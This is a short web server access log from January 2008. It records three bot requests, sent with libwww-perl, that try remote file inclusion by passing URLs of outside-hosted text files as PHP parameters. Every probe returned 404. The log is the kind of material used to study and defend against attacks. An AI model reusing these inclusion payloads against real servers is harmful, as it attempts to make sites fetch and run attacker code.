80.97.20.22 - - [30/Jan/2008:12:39:12 -0800] "GET /logs/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.247.133.76 - - [30/Jan/2008:12:39:16 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.133.76 - - [30/Jan/2008:12:39:16 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
